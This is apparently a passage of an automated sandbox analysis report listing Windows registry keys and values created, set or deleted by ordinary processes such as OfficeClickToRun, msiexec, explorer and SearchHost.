Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.13 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018400FA7157F67 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.7 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|0" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}\ApplicationFlags = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.9 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.11 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.8 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry\Volatile\MsaDevice C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133637932500772403" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.3 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|3" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|8" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigIds C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ETag = "std::wstring|\"1CsAILylG9NZlBGtLHQ8OHhk9mHTuJ1YMNlmpEv6dn8=\"" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2C C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.1 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.2 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.5 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\VersionId = "uint16_t|0" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\Expires = "int64_t|1719363189" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}\DeviceTicket C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2c C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2e C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|13" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|5" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|9" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.10 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|10" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2B C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\Expires = "int64_t|0" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe11000000c71d209b5fbcda01cc442979fec6da011443508efec6da0114000000 C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "2730" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "1097" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8A567BD6FA501A947AD1F646E53EEC14\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\Package Cache\\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}v14.30.30704\\packages\\vcRuntimeAdditional_amd64\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "1064" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5040806F8AF9AAC49928419ED5A1D3CA\SourceList C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259} C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "2730" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).y = "4294967295" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders C:\Windows\System32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).x = "4294967295" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "1097" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5040806F8AF9AAC49928419ED5A1D3CA\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\Package Cache\\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}v14.30.30704\\packages\\vcRuntimeMinimum_x86\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\679E80FBE29B63345BF612177149674C\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\Package Cache\\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\\packages\\vcRuntimeAdditional_x86\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00006109E70000000100000000F01FEC\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00006109E70000000100000000F01FEC\SourceList\LastUsedSource = "n;1;C:\\program files\\microsoft office\\root\\integration\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616209" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).top = "79" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).y = "4294967295" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "788" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "1064" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "13676" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
